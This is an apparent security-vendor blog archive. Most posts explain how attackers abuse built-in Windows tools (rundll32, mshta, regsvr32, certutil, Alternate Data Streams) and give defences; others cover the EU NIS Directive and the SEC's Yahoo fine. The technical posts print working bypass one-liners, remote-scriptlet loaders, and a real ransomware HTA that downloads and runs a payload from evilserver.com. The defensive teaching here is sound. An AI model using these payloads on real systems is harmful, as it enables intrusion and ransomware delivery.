All posts by Andy Green

The Malware Hiding in Your Windows System32 Folder: More Rundll32 and LoL Security Defense Tips

When we left off last, I showed how it’s possible to run VBScript directly from mshta. I can play a similar trick with another LoL-ware binary, our old friend rundll32. Like mshta, rundll32 has the ability to evade the security protections in AppLocker. In other words, hackers can leverage a signed Windows binary to run handcrafted scriptware directly from a command line even though AppLocker officially prevents it. Evil.

Oddvar Moe, one of this blog's favorite security bloggers, has studied LoL workarounds to AppLocker. In my own experimenting, I was able to confirm that rundll32 can avoid AppLocker's security defenses.

For example, AppLocker blocked direct execution of a line of JavaScript that pops up an alert message, but when I fed the same one-liner directly into rundll32, it ran successfully.
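For reference, the one-liner looked something like the following. This is a sketch — the alert text is my own — but the javascript: protocol trick is the well-known one: rundll32 loads mshtml and calls its RunHTMLApplication export, which happily runs whatever script follows.

```shell
rem Sketch only: the message text is hypothetical. rundll32 loads mshtml,
rem invokes RunHTMLApplication, and executes the JavaScript after the semicolon.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('AppLocker cannot see me');
```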

AppLocker is not perfect.

I also gave rundll32 slightly more complicated JavaScript that pulls in a remote object and executes it using GetObject, similar to what I did last time with mshta. It ran flawlessly even though AppLocker disabled scripts.

AppLocker can’t stop rundll32 from running a remote COM object.

As before, I had enabled more granular auditing. I took a peek at the event logs, and thankfully Windows logs the complete command line when the JavaScript is passed directly to rundll32. That’s good news for security defenders.

You can turn on granular logging in Windows to see command line details. Beware: you’re flooded with event details.

Where Is This Going? Lol-Ware Post-Exploitation!

These LoL-ware binaries have incredible abilities to run scripts stealthily. And one would think that pen testers would be working out some post-exploitation tools based on this idea. One of the advantages of using scripting languages other than PowerShell is that IT security groups are not necessarily focused on, say, JavaScript.

This was some of the inspiration behind Koadic, which is a command and control (C2) environment, or, more familiar to us, a remote access trojan or RAT. Koadic allows security testers to open up a reverse shell, dump hashes, pivot using PtH techniques, retrieve files, and run arbitrary commands.

LoL and RAT had a love child, and they called it Koadic. Note the mshta stager.

In the above graphic showing the Koadic environment, you can see that it leverages mshta as a payload launcher to get a foothold on the target computer.

The idea is that the attacker takes the “stager” — the mshta code with the URL — and then embeds it, as we saw, directly in an HTA file or in an Office document's macros that are executed when the document is opened.

I’ll be delving more deeply into Koadic in a future post. And I’ll be proving that a corporate IT security group is no match for a capable high-school student. Stay tuned.

Defense Anyone?

AppLocker can’t completely disable script execution. You can resort to simply turning off the Internet spigot by using Windows Firewall. I showed you how to block outbound traffic for a specific binary here.

For a more complete solution, you’ll need to go back to AppLocker, and exclude or blacklist the offending utilities from being executed by “ordinary users”. Something like what I did below, where I prevented users in the “Plain User” group from executing rundll32 while still allowing administrators:

Use AppLocker to exclude ordinary users from being able to run non-ordinary Windows binaries.
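If you prefer scripting to clicking through the GPO console, the AppLocker PowerShell cmdlets can get you most of the way there. A rough sketch, with my own group and file names; note that New-AppLockerPolicy generates Allow rules, so you'd flip the rule's Action attribute from "Allow" to "Deny" in the XML before importing:

```shell
rem Sketch only: the "Plain User" group and file names are hypothetical.
rem Build a publisher rule for rundll32.exe and save it as XML.
powershell -command "Get-ChildItem C:\Windows\System32\rundll32.exe | Get-AppLockerFileInformation | New-AppLockerPolicy -RuleType Publisher -User 'Plain User' -Xml | Out-File .\rundll32-rule.xml"

rem After editing the XML's Action attribute from Allow to Deny,
rem merge it into the effective local AppLocker policy.
powershell -command "Set-AppLockerPolicy -XmlPolicy .\rundll32-rule.xml -Merge"
```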

The harsh reality is that there really isn’t a fool-proof solution to LoL hackery. There will always be phish mails that allow attackers to get a foothold and then leverage existing Windows binaries.

In this series, we explored regsvr32, mshta, and rundll32. And while the LoL techniques behind them are well known and defenses are available, these binaries are still being successfully used by attackers, as this recent article proves.

And there are the unknown unknowns: new LoL techniques that the security world may not yet be aware of but that are already being tried.

What do you do?

This brings us back to a familiar theme of the IOS blog: the hackers will get in, and so you need secondary defenses.

This means categorizing your data; finding the data files that contain sensitive information and putting more restrictive access rights on them to limit what the hackers can potentially discover; and then using monitoring techniques that alert your security teams when the attackers access these files or exhibit unusual file access or creation activities.

Hold this thought! We'll see that Koadic, though very clever, is not completely stealthy. It produces some noise, and it's possible to detect a Koadic-based attack even when it's not directly accessing sensitive data.

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the ancient type command. As it turns out, there are a few other Windows utilities that also let you copy into an ADS.

For example, extract, expand, and our old friend certutil are all capable of performing this ADS trick. For a complete list of these secret file-copying binaries, check out Oddvar Moe’s latest gist.

In my testing, I used extract to copy a piece of evil JavaScript malware into the ADS of a .doc file.

In the old command shell, dir /r shows you the ADS for each file.
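My session looked roughly like this. The file names are my own invention, and I'm showing extrac32, the close cousin from Oddvar's gist whose /Y /C switches do a plain file copy; the destination of the copy can name an alternate data stream:

```shell
rem Hypothetical file names. /Y suppresses prompts, /C copies source to
rem destination, and the destination here is a named stream on a .doc file.
extrac32 /Y /C evil.js invoice.doc:evil.js

rem A plain dir shows invoice.doc at its original size; /r reveals the stream.
dir /r invoice.doc
```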

Ready, Set, Launch

This brings up a larger point about Windows utilities: they can perform multiple functions — some of them less well known than others. In fact, the aforementioned utilities listed by Oddvar are all capable of a normal file copy as well as the ADS variant.

This is not a revelation in itself. However, it does mean that security monitoring software that's trying to detect, say, an unusual file copy or transfer can't just rely on searching the Windows Event logs for a “copy” in the command line. Living off the land (LoL) is all about trickery and making it harder for the defense to understand that their IT systems are even under attack.

This leads to a favorite topic of the IOS blog: security software that doesn't have visibility into the underlying file system structures can be easily tricked by hackers. Oh wait, there just happens to be a solution that looks under the file system hood and so won't be taken in by these LoL techniques.

Let’s get back to the actual execution of the evil malware embedded in the ADS. There are a few ways to accomplish this. You can embed JavaScript, as I did last time, and then execute the ADS using wscript, the Windows-based app that runs the scripting engine.

For kicks, I tried cscript, which is the command-line version, and you can gaze on the GIF I created of my hacking session:

You are getting sleepy as you watch this GIF showing JavaScript malware launched from the ADS. Sleepy.

Can you embed an HTA file and launch the malware with mshta? Affirmative.

And PowerShell works fine as well. Oddvar Moe also has a great post enumerating different ways to launch executables from the ADS. Thanks (again) Oddvar!
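To give a flavor of the launch options Oddvar enumerates, here's a sketch with hypothetical file and stream names:

```shell
rem wscript runs the script engine directly against the named stream.
wscript invoice.doc:evil.js

rem cscript is the console equivalent.
cscript invoice.doc:evil.js

rem PowerShell can read a named stream with -Stream and execute its contents.
powershell -command "Invoke-Expression (Get-Content .\invoice.doc -Stream evil.ps1 -Raw)"
```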

Back to the Event Logs

I confess to being a little reluctant to turn on more granular event auditing in my VirtualBox environment – it’s sluggish enough as it is.

I threw caution to the wind, and enabled the command line auditing setting, which can be found buried in the GPO console under \Computer Configuration\Administrative Templates\System\Audit Process Creation. Now, I’ll be able to see command line arguments for every process that’s launched. And having previously enabled PowerShell command logging, I’ll be faced with an embarrassment of logging riches.
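If you'd rather flip the same switches from an elevated command prompt, the GPO setting corresponds (to the best of my knowledge) to an audit policy subcategory plus a registry value:

```shell
rem Enable auditing of process creation events (event ID 4688).
auditpol /set /subcategory:"Process Creation" /success:enable

rem Include the full command line in those 4688 events.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
```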

To its credit, Windows logs very detailed information — for example, the ADS I referenced when I launched my aforementioned evil JavaScript:

Got you! With command line auditing, the reference to the JavaScript hidden in the ADS is now visible for all to see in the log.

There’s also a log entry displaying the actual PowerShell code (launched by the JavaScript) — in my scenario, it pulls down a remote PowerShell script and then executes it:

Hmmm, a PowerShell session that downloads and executes a remote script. Wonder if it’s connected with JavaScript in the ADS file?

Even with all this extra information in the log, it’s still not necessarily an easy task — there are tools to help, of course — to correlate these two separate events, the cscript and the PowerShell session, and then determine that abnormal activity is taking place.

One More Thing: Rundll32 and Command Line JavaScript

If you don’t enable Windows granular command line tracking and PowerShell auditing for performance reasons, then data security monitoring and incident detection become almost impossible when faced with the malware-free techniques used by hackers. To add to the security conundrum, hackers have even more tricks up their virtual sleeves to make life difficult for IT security groups.

Some Lol-ware that accepts a local script file or remote URL reference — for example, mshta — also allows raw JavaScript (or VBScript) to be passed into the command line!

I’ve not mentioned rundll32 before, but it’s a LoL binary that has this direct JavaScript capability. The following bit of script using rundll32 does as advertised — launching a PowerShell session that then writes a little “Boo” message. In real-world hacking, this message would be replaced with the first step in the attack.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");

Infosec analysts who are searching through raw Windows logs on a server in which granular auditing has been disabled will have a difficult time working out a connection between a rundll32 process event and a subsequent PowerShell event. Unless they’ve read this post!

There’s still more.

Remember scriptlets, those bits of JavaScript that can be treated like COM objects?

So … here’s a great one-liner that uses GetObject to pull in a remote scriptlet and then execute it locally. You just need a small bit of JavaScript (or VBScript) to call the GetObject method. Both rundll32 and mshta can accept the script directly. And the mshta version using VBScript to call GetObject is as follows:

mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))

Basta!

I think we’ve covered enough ground in this post. At the end of the day, I’m presenting different ways hackers can inflict pain on a beleaguered IT security group. If you’re looking for homework till next time, you can ponder these last two scripts, and study this Stack Overflow article explaining how rundll32 does its magic. We’ll take another look at rundll32, and I’ll chat about some ways to protect against this hacker voodoo.


EU NIS Directive (NISD) Holds Surprises for US Online Companies

Last month, a major data security law went into effect that will impact businesses both in the EU and the US. No, I’m not talking about the General Data Protection Regulation (GDPR), which we’ve mentioned more than a few times on the IOS blog. While more narrowly focused on EU “critical infrastructure”, the NIS Directive or NISD also has some surprising implications for non-EU companies not remotely in the business of running hydroelectric plants or other critical or essential services.

It’s a Directive!

A key point to keep in mind is that this new law is a directive. We know from the pre-GDPR Data Privacy Directive (or DPD) that, in the language of EU bureaucrats, a directive is an outline or template for a law. Individual EU countries will have to fill in the details when they “transpose” it into local laws.

NISD merely says that certain companies that perform “essential services” — EU-speak for critical infrastructure — must take “appropriate technical and organizational measures” against cyber attacks and then notify authorities “without undue delay” when there’s a significant security incident.

That is all she wrote!

Because NISD is not in any way prescriptive, there’s a lot of wiggle room for legislators to fill in the details. Yes, this does mean that, like the older DPD privacy law, NISD will vary significantly by country – with some national regulators being far stricter with fines and enforcement.

A few countries have already implemented NISD — for example, the UK has localized its version – but most are still hammering out the details. As it turns out, the laggards have a little more time to work out their individual laws. NISD says that EU countries really have until November 2018 to identify specific operators of essential services.

That’s right! Unlike the GDPR, the NISD (for the most part) will apply to an explicit set of companies in the essential services sector, which include energy, transportation, health, financial and banking.

As I write this, I am not aware of any EU country that has produced this list. In effect, NISD is on pause until we hear more from local governments on the essential service picks.

US Digital Service Providers Are Under NISD

However, NISD carves out an exception for digital service providers. EU countries do not have to come up with a list of companies that offer essential online infrastructure. According to NISD, any company offering cloud computing, online marketplaces connecting buyers with sellers, or search engine services is automatically a digital provider!

And they would fall under NISD rules right now. (FYI: Micro and small digital providers that have under 50 employees and less than €10 million revenue are excluded.)

US companies in the cloud and online marketplace space — and there are many — will certainly have to up their game for their EU locations.

But there’s another catch.

Remember how the GDPR applies to companies outside the EU even if they don’t have a physical presence there?

Like the GDPR, NISD also has an expanded territorial scope aspect. If a US company has, say, an online marketplace for apartment vacation rentals and promotes that service in the UK or France, then it would fall under NISD. You can read more about the international territorial scope of NISD in this legal article.

Reporting a NISD Cyber Attack

NISD lists a few parameters to help digital service providers decide whether a cyber attack has had a “substantial impact” on its operations. They include the number of subscribers affected, duration, geographical scope, and economic costs.

The fine print from NISD for reporting a cyber incident affecting a digital service provider.

For example, a ransomware, DDoS, or other disruptive cyber attack impacting a US online service company offering, say, apartment or car sharing, web hosting, or, cough, search engines in the EU market, regardless of whether it has physical EU servers, is covered by NISD. And it would have to report the incident to the local regulator, known in NISD as a Computer Security Incident Response Team or CSIRT.

There will be fines for noncompliance!

As a baseline, the UK’s implementation of NISD has set maximum fines of £17 million. Mileage can vary, of course, as each EU country is free to set its own fines and penalties.

In any case, US digital providers now have another EU law to take into account. In short, not only do they have to comply with the GDPR’s security and privacy rules for personal data, but also NISD’s more general requirements for securing IT and networking infrastructure against disruption.

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams

We don’t like to think that the core Windows binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsvr32 and mshta (LoL-ware) are the equivalent in the non-virtual world of garden tools and stepladders left near the kitchen window. Sure, these tools are useful for work around the yard, but unfortunately they can also be exploited by the bad guys.

Take, for example, HTML Applications, or HTA, which I wrote about last time. At one point, it was a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps (without all the browser chrome). That was back in the early ‘aughts.

Microsoft no longer supports HTA, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn – the Windows\System32 folder.

And hackers have been only too eager to take advantage of it. To make matters worse, on far too many Windows installations, the .hta file extension is still associated with mshta. A phishmail victim who receives an .hta file attachment will automatically launch the app if she clicks on it.

Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks — see, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file using mshta, and you can see the results below:

Still crazy after all these years: mshta and .hta

It worked fine.

In a hacking scenario where the attacker is already on the victim’s computer, she could download the next phase using, say, curl, wget, or PowerShell’s DownloadString, and then run the embedded JavaScript with mshta.

But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land using existing Windows binaries is to hide activities.

Certutil and Curl-free Remote Downloading

This leads to certutil, which is yet another Windows binary that serves dual purposes. Its function is to dump, display, and configure certification authority (CA) information. You can read more about it here.

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsvr32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

It’s a certification tool. No, it’s a stealthy way to download malware. Certutil is both!

This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into a LoL-ware version of curl.
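The certutil-as-curl trick boils down to a one-liner like this (the URL and file name are placeholders):

```shell
rem -urlcache fetches the URL, -split writes the payload to disk,
rem and -f forces a fresh download. URL and file name are placeholders.
certutil -urlcache -split -f http://evilserver.com/payload.ps1 payload.ps1
```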

As it turns out, hackers were way ahead of the researchers. It was reported that Brazilian hackers have been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

Hiding Executables With Alternate Data Streams (ADS)

Can the attackers get even stealthier? Unfortunately, yes!

The amazingly clever Oddvar Moe has a great post on Alternate Data Streams, and how it can be used to hide malware scripts and executables in a file.

ADS was Microsoft’s answer to supporting compatibility with the Apple Macintosh file system. In the Mac world, files have a lot of metadata in addition to the regular data associated with them. To make it possible to store this metadata in Windows, Microsoft created ADS.

For example, I can do something like this:

Omg, I directed text into a file and the file size didn’t change! Where did it go? It’s in ADS. #stealthy

On a first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.

Take a closer look at the above screenshot, and notice the “:evil.ps1” that’s tacked on. And then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!

What happened to the text I directed into the file? It’s hidden in the ADS part of the Windows file system. It turns out that I can directly run scripts and binaries that are secretly held in the ADS part of the file system.
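The screenshot boils down to something like this — my reconstruction, with hypothetical file names:

```shell
rem Redirect a script into a named stream of stuff.txt, not the file itself.
type evil.ps1 > stuff.txt:evil.ps1

rem The main stream is still 0 bytes...
dir stuff.txt

rem ...but /r exposes the hidden stuff.txt:evil.ps1:$DATA stream.
dir /r stuff.txt
```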

And One More Thing

We’ll take a deeper dive into ADS next time. The larger point is the high-level of stealthiness one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on github.

For example, there is a class of Windows binaries — esentutl, extrac32, and others — that act as file copy tools. In other words, the attackers don’t necessarily have to reveal themselves by using the obvious Windows “copy” command.

So security detection software that’s based on scanning the Windows Event log looking for the usual Windows file commands will miss sneaky LoL-based hacker file activity.

The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.

Does the LoL-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Learn more!


What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With Yahoo Fine

The Securities and Exchange Commission (SEC) warned companies back in 2011 that cyber incidents can be costly (lost revenue, litigation, reputational damage), and therefore may need to be reported to investors. Sure, there’s no specific legal requirement to tell investors about cybersecurity incidents, but public companies are required by the SEC to inform investors in their filings if there’s any news that may impact their investment decisions.

Actual cyber incidents or even potential security weaknesses can be, in legal speak, “material” information that would have to be reported to the SEC immediately in 8-Ks, or in quarterly 10-Qs, and annual 10-K forms. You can read more about what material means in our post on the SEC’s latest guidelines for cyber reporting.

And then along came Yahoo and its massive breach, which occurred way back in 2014 and wasn’t publicly reported until 2016. To refresh memories: after more than a two-year delay, Yahoo initially said that a mere 1 billion accounts had been stolen, but later adjusted that number to 3 billion.

The disclosure of this massive breach came after Verizon had announced its acquisition of Yahoo. This new information ultimately led Verizon to reduce its bid for Yahoo by about $350 million.

If there were ever a test case for the SEC to show that it was serious about enforcing the reporting of material cyber incidents, this would be it.

The SEC Has Spoken

In late April, the SEC announced a settlement with Yahoo, now known as Altaba, in which it agreed to pay a fine of $35 million. I’ve excerpted part of the actual settlement below, because it should be required reading for CSOs, CISOs, CPOs, as well as CFOs and CLOs (but they usually read this kind of thing with their breakfasts):

Despite its knowledge of the 2014 data breach, Yahoo did not disclose the data breach in its public filings for nearly two years. To the contrary, Yahoo’s risk factor disclosures in its annual and quarterly reports from 2014 through 2016 were materially misleading in that they claimed the company only faced the risk of potential future data breaches that might expose the company to loss of its users’ personal information stored in its information systems … without disclosing that a massive data breach had in fact already occurred.

Ouch!

This SEC action comes on top of a separate $80 million settlement for a class-action suit brought by investors related to the data breach. There are other lawsuits pending, and you can read about the whole Yahoo legal mess here.

What Should Yahoo Have Done When it Discovered the Breach?

In December 2015, after Yahoo’s CISO learned that highly sensitive information from well over 100 million users had been hacked (usernames, email addresses, hashed passwords, and telephone numbers), upper management, including the legal team, was informed.

The SEC noted that then “senior management and relevant legal staff did not properly assess the scope, business impact, or legal implications of the breach, including how and where the breach should have been disclosed in Yahoo’s public filing …”

And the SEC pointed out that upper management didn’t disclose the breach to Yahoo’s auditors or outside counsel to get their advice.

Yeah, they should have filed an 8-K immediately.

More specifically, the SEC called out Yahoo for not maintaining “disclosure controls and procedures” for reporting, analyzing, and assessing both actual security incidents and potential security weaknesses.

In plain speak, companies are supposed to have agreed-upon procedures to get cybersecurity information to management, and higher management needs rules in place to guide them in analyzing and disclosing a breach or potential data security risk.

Let’s Go to the SEC Files

To get a sense of how a company reports its cybersecurity status when it wants to say there’s nothing unusual going on, I found a plain, garden-variety example after reviewing some 10-K annual reports on the SEC’s site (and gulping down a few coffees):

Boilerplate risk assessment: when infosec is going well, this is what you report.

You usually can find this kind of information in the risk section of the report. In short: this company has the usual standard cyber risk profile, and in its case, there are currently no serious cyber incidents impacting it.

Good enough.

Then I looked at Yahoo’s annual report from 2016, when it discussed what it refers to as “the security incident” for the first time.

What you say when you have a “security incident”.

Obviously, this information should have been reported much earlier, but note that Yahoo discusses the PII that was exposed, along with the extent of the exposure – at least 500 million accounts – and the status of its investigation.

CFO Learns Programming

In the next post, I’ll provide more details and some advice about what public companies need to be doing to meet the SEC’s data security reporting guidelines. However, it’s clear from reading the SEC’s latest guidance from earlier this year – and I’m saying that as a blogger, not as a compliance attorney – that C-levels will be forced to learn basic computer and data security knowledge.

To make the SEC (and investors) happy, public companies should go beyond having breach disclosure procedures in place. At some point, the raw intelligence will need to be examined by well-informed decision makers at the top. As the SEC guidance points out, companies should “evaluate the significance associated with such [cyber] risks and incidents.”

In other words, the CEO, CFO, and the legal team will need to acquire the appropriate technical background to understand what it means when, say, an assessment report says that your customers’ credit card directory has an “Everyone” ACL, or that a hashed password file was stolen but can be easily cracked.

I’m not saying your CFO should take Computer Science 101 and understand what hashing means — though it’s not a bad idea! — but the C-suite should have the technical and infosec context to make the right evaluation!

More C-suite infosec wisdom next time.

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware

The LoL approach to hacking is a lot like the “travel light” philosophy for tourists. Don’t bring anything to your destination that you can’t find or inexpensively purchase once you’re there. The idea is to live like a native. So hackers don’t have to pack any extra software in their payload baggage to transfer external files: it’s already on the victim’s computer in the form of regsvr32.

As I pointed out last time, there’s the added benefit that regsvr32 allows hackers to stealthily execute JavaScript and VBScript without being detected by AppLocker.

The victim clicks on a phishing email attachment or downloads and opens a file from the hacker’s website, and then a single command line of regsvr32 can run a script (technically, through Windows Script Host) that performs the initial setup of what is typically a multi-step attack. No malware binaries involved, since it’s all done “legally” through resident software.
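That single command line is Casey Smith’s well-known regsvr32 scriptlet trick. With a placeholder URL, it looks like this:

```shell
rem /s silent, /n skip DllRegisterServer, /u call DllUnregisterServer,
rem /i pass the URL to scrobj.dll, which fetches and runs the remote
rem scriptlet. The URL is a placeholder.
regsvr32 /s /n /u /i:http://evilserver.com/payload.sct scrobj.dll
```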

It’s slick, low-profile hacking.

Some Mitigations For Regsvr32 Attacks

In terms of defending against LoL-ware, the major stumbling block is that these leveraged Windows tools also have legitimate uses. You can’t simply eliminate regsvr32.

One approach to reducing the risks of LoL-ware is through the whitelisting techniques available in AppLocker. When was the last time you, as an ordinary user, needed regsvr32? I manage to go through my blogging day without having to register DLLs.

The larger point, of course, is that most LoL-ware is meant for sysadmins. Back when I was first writing about PowerShell as an attack tool, I described how to use AppLocker to limit who can work with PowerShell. A pure whitelist approach is difficult to pull off, so I just used AppLocker’s default rules and made some exceptions — only allowing power users access to PowerShell.

I can do something similar with LoL-ware binaries, and you can see the results below when I try to run regsvr32 as ordinary user bob.

Take that hacker! I blocked you with AppLocker.

Another, less drastic, mitigation is simply to turn off Internet access for regsvr32. In other words, prevent it from running remote scriptlets living on the hackers’ own servers.

This can be accomplished through Windows Firewall, which I found under the Administrative Tools section of my Windows 7 environment. The Firewall console lets you tune network access on a per-application basis. In my case, I turned off outbound access for regsvr32 to both public networks (the Internet) as well as internally within the domain. Regsvr32 still works normally for DLL registration, but I’ve effectively disabled the /i option’s secret feature of pulling scripts from the Intertoobz.

Did you know that Windows Firewall gives you granular control over individual apps? You do now!
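For the script-inclined, the same outbound block can be set from an elevated prompt with netsh (the rule name is my own):

```shell
rem Block all outbound traffic from regsvr32.exe; local DLL registration
rem still works, but remote scriptlet fetches fail.
netsh advfirewall firewall add rule name="Block regsvr32 outbound" dir=out program="C:\Windows\System32\regsvr32.exe" action=block enable=yes
```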

By the way, this seems to be the approach taken by Amazon Web Services, and I suspect other cloud providers as well. When I recently tried the regsvr32 /i hack on an AWS instance, it failed. It took me a while to realize it was being blocked by the default Firewall rules that now seem to be standard for AWS.

Kudos to Amazon for keeping up with LoL-ware mitigations.

And Along Came HTA

A long time ago, on a distant operating system (XP), Microsoft introduced this idea called HTML Applications, or HTA. The idea was to let developers create web applications for Internet Explorer (IE) without “enforcing the strict security model and user interface of the browser.” They even got a patent for it back in 2003.

They discontinued this awesome idea and stopped supporting it in later versions of IE, but the underlying engine that does the real work, mshta.exe, can still be found under \Windows\System32.

Of course, during the time when HTA was available, hackers realized they could get IE to launch scripts without the standard browser security checking for, cough, ActiveX objects. And that meant they could obtain shell sessions and run malicious code.

Here’s an old article, circa 2003, describing this technique.

Since current IE browsers no longer support HTA, adaptable hackers found another way to deliver the HTA code to users. They sent it as an email attachment — duh! — with an .hta extension, and tricked victims into clicking on the file.

Wait, can that work?

Yes! As I mentioned, the legacy mshta.exe is, presumably, still there to support old HTA apps that were written by over-eager developers. And on far too many sites, the .hta file type is — agonizing sigh — associated by default with mshta.

All too often, .hta is still associated with mshta. #humans!

In other words, by clicking on a file with an .hta suffix, the victim of a phishing email launches mshta and runs the script embedded in the HTML.

What does the HTA file look like? Here’s a sample script taken from a real-world ransomware attack.

<HTML>
<HEAD>

<script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>

</BODY>
</HTML>

Similar to the COM scriptlets I wrote about, the HTA file acts as a container for a few lines of JavaScript. The goal is to launch a PowerShell session that downloads and directly executes the code containing the next phase of the attack.

Mshta Meets Locky

Unfortunately, many IT groups aren’t aware that native Windows binaries, such as regsvr32, mshta, and more, can be used against them.

A good example of this is hackers sending phishing emails with attached HTA files and ultimately getting victims to self-install ransomware. The success of Locky ransomware and its variants is actually based on simple and crudely designed social attacks (below).

Yeah, this cleverly written phish mail tricked many people into clicking on an HTA file and launching a ransomware attack.

Another effective ploy was emailing corporate victims and asking them to download a Chrome browser update from the hacker’s website. In fact, the HTA code above was taken from a file called chrome_patch.hta used in a real-world ransomware attack.

The social engineering in either of these approaches is just clever enough to fool an average employee who hasn’t received any special security training. Or perhaps an executive who’s a little too busy and susceptible to clicking on a phish mail attachment referring to, say, a FedEx invoice.

For kicks, I took some of the HTA above, tweaked it so it would download my PowerShell “boo” message, and then used a JavaScript obfuscator to make it even stealthier and less likely to be detected by malware scanners. I also added a .pdf suffix before the .hta, to trick the unwary user:

Obfuscated JavaScript embedded in HTML by way of HTA. #sneaky

When I clicked on the HTA file, I was presented with a security dialog — thank you, Microsoft, for this tip-off — asking whether I wanted to “run” what is supposed to be a document.

What happens when you click on an HTA file? You get a warning from Microsoft, but many people clicked on “Run” anyway.

All too many users became victims of Locky because they went ahead and clicked through what was a security warning. Humans like to click!

Mshta Mitigations

Ransomware attacks in the last two years that were based on HTA could have been easily stopped with a few simple configurations. As we saw above for regsvr32, closing internet connectivity for mshta through the Windows Firewall, or blocking it for average users with AppLocker, are both good defensive measures.

Even simpler is to change the .hta file type association from mshta to something more benign — like launching Notepad! By the way, that’s a very common defensive approach, and the user should have some questions when she sees the file is not an invoice. At least, we hope so.
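Here’s a rough sketch of that re-association from an elevated command prompt. I’m assuming the default htafile ProgID; check what your own system actually uses first:

```
:: See what .hta currently maps to (typically .hta=htafile)
assoc .hta

:: See what the htafile ProgID currently launches (typically mshta.exe)
ftype htafile

:: Re-point htafile at Notepad, so a clicked .hta is merely displayed as text
ftype htafile="%SystemRoot%\System32\notepad.exe" "%1"
```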

In the next post, we’ll look at a few more binaries that allow you to run scripts. And then we’ll review other LoL-ware that lets you mask common file activities.

I hope you’re seeing that the main point of LoL hackcraft is to make it appear to observers in the IT security room that the hacker is just another user running standard Windows utilities. And to reduce the damage of these attacks, you’ll need better secondary defenses!

Continue reading the next post in "Living off the Land With Microsoft"

The Malware Hiding in Your Windows System32 Folder: Intro to Regsvr32


In our epic series on Malware-Free Hacking, I wrote about techniques that let you use well-known Microsoft apps and tools to run evil custom scripts. This file-less hack-craft usually involves sneaking obfuscated VBA into Office documents. But there’s more file-less evil out there.

For this new mini-series, I want to dive into something called LoL, for Living off the Land, in which hackers reuse less well-known Windows utilities to hide script payloads and cloak other activities. This GitHub page contains a nice collection of all the different binaries and scripts — with sample attack code — that fall under the LoL genre (h/t Oddvar Moe).

The more important point with LoL is its underlying philosophy: you hide your attack by using Windows software in ways that weren’t intended by the developers. Not only does this approach get past conventional malware scanning, but there are other benefits.

As we’ll soon see with regsvr32, which allows for JScript or VBScript to be injected into DLLs, LoL attacks can also evade Microsoft’s AppLocker and avoid easy spotting in the event logs.

Yeah, LOL techniques allow malware to blend into the scenery and make it difficult to spot in the wild.

Regsvr32 and Squiblydoo

From what I can decipher, one of the founding fathers behind using regsvr32 as a post-exploitation LoL tool is security researcher Casey Smith.

But first, do you know what regsvr32 even does? Answer: It registers DLLs into the Windows Registry, allowing other software to access the library as needed. Seems harmless.

In 2016, Casey discovered that regsvr32’s /i parameter, which is used to trigger any initial installation processing, accepts a COM scriptlet. In other words, an administrator can insert dynamic code when the DLL sets itself up.

Remember scriptlets? I discussed them in my malware-free series. They are simply JScript or VBScript code embedded in XML, allowing them to be passed around as COM objects (below).

<?XML version="1.0"?>
  <scriptlet>
  <registration         
  progid="Pentest"       
  classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
  <script language="JScript">
      <![CDATA[
       var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop -c write-host Boo!"); 
  ]]>
  </script>
  </registration>
  </scriptlet>


By using regsvr32 with /i, Casey showed he could run scripts in a directory that was locked down by AppLocker. AppLocker is the Windows security technology that I experimented with in my legendary PowerShell obfuscation series. Well, I was impressed with it at the time.

His clever proof of concept made some news in 2016. Ultimately his technique, known as Squiblydoo, found its way into real-world malware used by known APT groups — for example, in this spear phishing campaign against Russian businesses last summer, and more recently in some cryptomining craziness.

This is a serious security threat, and leveraging regsvr32 this way makes it far easier for hackers to go about their work undetected.

Microsoft did respond, in Windows 10 at least, with a way to detect (not block) Squiblydoo — which it calls process hollowing — through an update to its Windows Defender ATP. (Yours truly has a trial copy of ATP, which is on my long list of things to test.)

The Microsoft band-aid helps a little. In the next post, I’ll present a few sensible mitigations to greatly lower security risks.

A Closer Look at Regsvr32

